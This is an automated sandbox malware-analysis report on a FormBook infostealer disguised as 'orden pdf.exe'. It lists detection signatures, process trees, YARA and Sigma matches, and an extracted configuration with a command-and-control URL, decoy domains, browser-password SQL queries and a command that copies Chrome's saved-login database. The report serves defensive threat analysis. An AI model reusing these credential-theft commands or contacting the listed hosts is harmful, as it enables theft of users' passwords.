Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report orden pdf.exe

Overview

General Information

Sample Name:orden pdf.exe
Analysis ID:339334
MD5:4f1ad14256cc9c420d78d69b468bab48
SHA1:7734beec32b17c6ef0678533cc9634bd2c890c65
SHA256:1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • orden pdf.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\orden pdf.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 4700 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 5476 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 4120 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
          • DeviceCensus.exe.exe (PID: 5652 cmdline: 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
        • systray.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6180 cmdline: /c del 'C:\Users\user\Desktop\orden pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2412 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cx9l_rq2dula.exe (PID: 5296 cmdline: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xcc1048c5", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122d4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "audereventur.com", "huro14.com", "wwwjinsha155.com", "antiquevendor.com", "samuraisoulfood.net", "traffic4updates.download", "hypersarv.com", "rapport-happy-wedding.com", "rokutechnosupport.online", "allworljob.com", "hanaleedossmann.com", "kauai-marathon.com", "bepbosch.com", "kangen-international.com", "zoneshopemenowz.com", "belviderewrestling.com", "ipllink.com", "sellingforcreators.com", "wwwswty6655.com", "qtumboa.com", "bazarmoney.net", "librosdecienciaficcion.com", "shopmomsthebomb.com", "vanjacob.com", "tgyaa.com", "theporncollective.net", "hydrabadproperties.com", "brindesecologicos.com", "sayagayrimenkul.net", "4btoken.com", "shycedu.com", "overall789.top", "maison-pierre-bayle.com", "elitemediamasters.com", "sharmasfabrics.com", "hoshamp.com", "myultimateleadgenerator.com", "office4u.info", "thaimart1.com", "ultimatewindowusa.com", "twoblazesartworks.com", "airteloffer.com", "shoupaizhao.com", "741dakotadr.info", "books4arab.net", "artedelcioccolato.biz", "tjqcu.info", "teccoop.net", "maturebridesdressguide.com", "excelcapfunding.com", "bitcoinak.com", "profileorderflow.com", "unbelievabowboutique.com", "midlandshomesolutionsltd.com", "healthywithhook.com", "stirlingpiper.com", "manfast.online", "arikorin.com", "texastrustedinsurance.com", "moodandmystery.com", "yh77808.com", "s-immotanger.com", "runzexd.com", "meteoannecy.net", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.joomlas123.info/n7ak/\u0000"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x94c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9742:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x153d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14ec1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x154d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1564f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa2ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1413c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xafc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b74a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18059:$sqlite3step: 68 34 1C 7B E1
    • 0x1816c:$sqlite3step: 68 34 1C 7B E1
    • 0x18088:$sqlite3text: 68 38 2A 90 C5
    • 0x181ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1809b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x181c3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 55 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.orden pdf.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.orden pdf.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.orden pdf.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18449:$sqlite3step: 68 34 1C 7B E1
        • 0x1855c:$sqlite3step: 68 34 1C 7B E1
        • 0x18478:$sqlite3text: 68 38 2A 90 C5
        • 0x1859d:$sqlite3text: 68 38 2A 90 C5
        • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.orden pdf.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.orden pdf.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Drops script at startup locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\orden pdf.exe, ProcessId: 2224, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 3652, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2412

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 2.2.orden pdf.exe.400000.1.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xcc1048c5", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122d4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted fileShow sources
          Source: orden pdf.exeVirustotal: Detection: 50%Perma Link
          Source: orden pdf.exeReversingLabs: Detection: 32%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
          Source: 2.2.orden pdf.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.orden pdf.exe.39e0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: orden pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: orden pdf.exe
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
